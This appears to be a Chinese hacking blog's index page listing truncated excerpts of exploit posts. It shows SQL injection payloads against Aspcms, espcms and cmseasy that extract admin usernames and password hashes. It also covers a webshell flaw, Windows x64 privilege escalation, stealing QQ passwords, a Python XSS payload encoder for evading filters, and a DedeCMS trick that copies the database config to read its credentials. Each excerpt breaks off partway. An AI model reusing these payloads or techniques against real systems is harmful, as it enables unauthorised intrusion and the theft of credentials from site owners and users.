Aspcms 1.5 COOKIES 注入漏洞

Aspcms 1.5 COOKIES注入0day,注册一个帐号。然后登陆后修改COOKIES的USERID值 在后面加上注入语句: UNION SELECT 1,2,3,4,5,6,username,adminpassword,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from Aspcms_admins 然后编辑帐号就能看到管理员的帐号和MD5密码值。 后...

- 阅读全文 -

espcms最新注入0day

上EXP。一步步来。暴出表前缀后,在修改后两句代码里面的表前缀。 爆表前缀: index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,table_name,0x27,0x7e)) from in...

- 阅读全文 -

emseasy最新注入漏洞

易通企业网站系统最新注入漏洞。 注入EXP: https://www.webshell.cc/celive/js/include.php?cmseasylive=1111&departmentid=0 直接放Havij里面跑。错误关键字:online.gif 添加表名:cmseasy_user 列表:userid,username,password 百度关键字:Powered by CmsE...

- 阅读全文 -

狂盗小说小偷GETshell漏洞及修复

很傻比的一漏洞 必须开启缓存才能利用 先看代码 book.php $kd_cachedir = "./cache"; if($kd_book_cache=="ture"){//缓存必须开启 $lastflesh = @filemtime($kd_cachedir."/book$shuid.html"); // echo $lastflesh; if(!file_exists("./cache/bo...

- 阅读全文 -

windows2003 x64 提权

最近看到很多基友遇到x64的版本素手无策,我最开始遇到的时候也折腾了好久,就写一下我提权的过程吧,无技术含量,本人表达能力不好,不喜勿喷,高手请飘过。 什么PR,IIS6,IIS7溢出对64位的版本都没有效果,包括LPK DLL截持,网上公布的X64提权0day好像也只有一个有效,就这个吧ms10048 x64。 先谈谈64位exp提权与32位exp提权的区别吧,我们平时执行exp的时候都是 c:...

- 阅读全文 -

手机QQ音乐播放器暴QQ密码

作者:Micro Da∵[达达] (转载请留下作者信息。尊敬他人的劳动成果。谢谢) 上次那个微信暴QQ密码文章被人转载了。还说是自己发现的洞。这次我就在图片上打了个水印。我看你怎么盗图片。 大牛别喷。。小菜我技术垃圾。 在参加西部安全会议前一天晚上发现了这个洞。。由于没电脑玩。只能玩手机了。。所以才用手机找到这个洞的。。。 这次是手机QQ音乐播放器暴QQ密码。只要安装QQ音乐播放器登入QQ。你的账...

- 阅读全文 -

XSS代码加密脚本

用来bypass一些检测规则或者条件限制 XSS加密还是很常见很常见的。 ''' Python XSS payload encoder Author: BGS (rstcenter.com) Contributor cmiN (rstcenter.com) Date: 13 August 2011 Version: Python 2.7 ''' #!/usr/bin/env python impo...

- 阅读全文 -

dede0day 利用小技巧

By:zafe 遇到可写不可执行的,可执行不可写的站的也许用的上 {dede:php}copy('../data/common.inc.php','../data/cache/test.txt');{/dede:php} 然后去xxx.com/data/cache/test.txt看数据库信息,如果是root那就happy吧 如果是普通用户,首先看下有哪些数据库: //自行把{dede:php}{...

- 阅读全文 -